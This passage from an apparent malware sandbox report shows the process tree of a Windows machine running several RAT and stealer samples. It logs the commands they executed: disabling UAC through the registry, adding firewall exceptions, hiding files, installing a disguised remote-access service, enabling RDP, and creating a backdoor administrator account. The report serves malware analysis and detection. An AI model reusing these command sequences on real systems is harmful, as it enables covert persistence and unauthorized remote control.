        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o_ccq299.cmdline"
        6⤵
        
        PID:6876
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA951.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc62442F7F67764F7F8611CFCCDFECB720.TMP"
        7⤵
        
        PID:3900
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\u-pimwtu.cmdline"
        6⤵
        
        PID:7664
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB45.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF15927C71E3A4BF98E0CAA4FB15F8C6.TMP"
        7⤵
        
        PID:5332
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cwwow__c.cmdline"
        6⤵
        
        PID:6120
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE14.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE123B4279DB244B1A472936AE76A4B30.TMP"
        7⤵
        
        PID:8084
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o33owgzu.cmdline"
        6⤵
        
        PID:3576
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB22B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB82B798542824CA0A47F546086527D8A.TMP"
        7⤵
        
        PID:5972
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mw1k1aqg.cmdline"
        6⤵
        
        PID:5132
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB661.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc46F8A6636EE5413C9CF2C8AEC11C90F.TMP"
        7⤵
        
        PID:7584
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\odoeh4jm.cmdline"
        6⤵
        
        PID:892
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB901.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc30E387C19E549A885DFA2B06DBF951A.TMP"
        7⤵
        
        PID:5696
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ej_zq13u.cmdline"
        6⤵
        
        PID:5568
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAF5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAFBC7576872E47F39CDC2F719622B3DB.TMP"
        7⤵
        
        PID:1852
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0ngfv2qq.cmdline"
        6⤵
        
        PID:2112
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBDD3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcABC619D54EBA4FD2B9E920DACDB6A08C.TMP"
        7⤵
        
        PID:4912
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mcxb_h5e.cmdline"
        6⤵
        
        PID:9004
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES22DC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8B540B568CEE417F9DAD1E1140A8DFEE.TMP"
        7⤵
        
        PID:6432
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v8z6mrcz.cmdline"
        6⤵
        
        PID:8012
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\k4ame_b1.cmdline"
        6⤵
        
        PID:6876
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8986.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE6FAD2F462004247A8F3F175C1DA819.TMP"
        7⤵
        
        PID:5828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2884 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1984
- C:\Users\Admin\Downloads\Remcos.exe
  "C:\Users\Admin\Downloads\Remcos.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:2316
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      Modifies registry key
      PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
    3⤵
    PID:2576
  - - C:\Windows\SysWOW64\PING.EXE
      PING 127.0.0.1 -n 2
      4⤵
      Runs ping.exe
      PID:1196
  - - C:\Windows\SysWOW64\Userdata\Userdata.exe
      "C:\Windows\SysWOW64\Userdata\Userdata.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in System32 directory
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:3864
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4520
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        Modifies registry key
        
        PID:3508
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:3440
- C:\Users\Admin\Downloads\NetWire.exe
  "C:\Users\Admin\Downloads\NetWire.exe"
  2⤵
  - Executes dropped EXE
  PID:836
- - C:\Users\Admin\Downloads\NetWire.exe
    "C:\Users\Admin\Downloads\NetWire.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    PID:1364
  - - C:\Program Files (x86)\internet explorer\ieinstal.exe
      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      4⤵
      PID:5508
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\NetWire.doc" /o ""
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:5856
- - C:\Windows\SYSTEM32\runonce.exe
    runonce.exe
    3⤵
    - Process spawned unexpected child process
    PID:8072
- C:\Users\Admin\Downloads\NJRat.exe
  "C:\Users\Admin\Downloads\NJRat.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4960
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:5180
- C:\Users\Admin\Downloads\CrimsonRAT.exe
  "C:\Users\Admin\Downloads\CrimsonRAT.exe"
  2⤵
  - Executes dropped EXE
  PID:5756
- - C:\ProgramData\Hdlharas\dlrarhsiva.exe
    "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
    3⤵
    - Executes dropped EXE
    PID:5892
- C:\Users\Admin\Downloads\Blackkomet.exe
  "C:\Users\Admin\Downloads\Blackkomet.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  PID:1852
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Users\Admin\Downloads\Blackkomet.exe" +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5904
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Users\Admin\Downloads" +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5940
- C:\Users\Admin\Downloads\Blackkomet.exe
  "C:\Users\Admin\Downloads\Blackkomet.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  PID:5212
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Users\Admin\Downloads\Blackkomet.exe" +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5224
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Users\Admin\Downloads" +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5988
- C:\Users\Admin\Downloads\Blackkomet.exe
  "C:\Users\Admin\Downloads\Blackkomet.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  PID:5676
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Users\Admin\Downloads\Blackkomet.exe" +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5304
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Users\Admin\Downloads" +s +h
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1
  2⤵
  PID:6780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6444 /prefetch:8
  2⤵
  PID:7312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7100 /prefetch:8
  2⤵
  PID:7744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6968 /prefetch:1
  2⤵
  PID:7192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5908 /prefetch:8
  2⤵
  PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7260 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5740
- C:\Users\Admin\Downloads\AgentTesla (2).exe
  "C:\Users\Admin\Downloads\AgentTesla (2).exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:7600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6308 /prefetch:1
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6608 /prefetch:8
  2⤵
  - NTFS ADS
  PID:6112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2656 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
  2⤵
  PID:5972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
  2⤵
  PID:1972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1
  2⤵
  PID:7060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  PID:7112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7336 /prefetch:8
  2⤵
  PID:7516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7016 /prefetch:8
  2⤵
  PID:7752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7676 /prefetch:8
  2⤵
  PID:1096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 /prefetch:8
  2⤵
  - NTFS ADS
  PID:2388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7148 /prefetch:8
  2⤵
  - NTFS ADS
  PID:7572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7952 /prefetch:8
  2⤵
  - NTFS ADS
  PID:6244
- C:\Users\Admin\Downloads\Azorult (3).exe
  "C:\Users\Admin\Downloads\Azorult (3).exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  - System policy modification
  PID:8088
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:1212
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      PID:5212
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:7984
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        UAC bypass
        Windows security bypass
        Runs .reg file with regedit
        
        PID:3844
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        Runs .reg file with regedit
        
        PID:6276
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:3144
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7820
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7964
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:460
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:5688
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:8692
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        
        PID:6844
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:684
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:7156
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:6384
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        5⤵
        
        PID:1616
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:1340
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6528
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6720
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7612
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:8552
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        
        PID:7292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        Modifies registry class
        
        PID:8440
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:7680
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:4296
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:8776
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:1960
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        Executes dropped EXE
        
        PID:5384
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:7524
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:4436
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:7276
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:2544
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:6616
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:1388
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:9164
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        
        PID:7932
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:6476
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        
        PID:6788
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:8672
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:7632
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\net1.exe
        
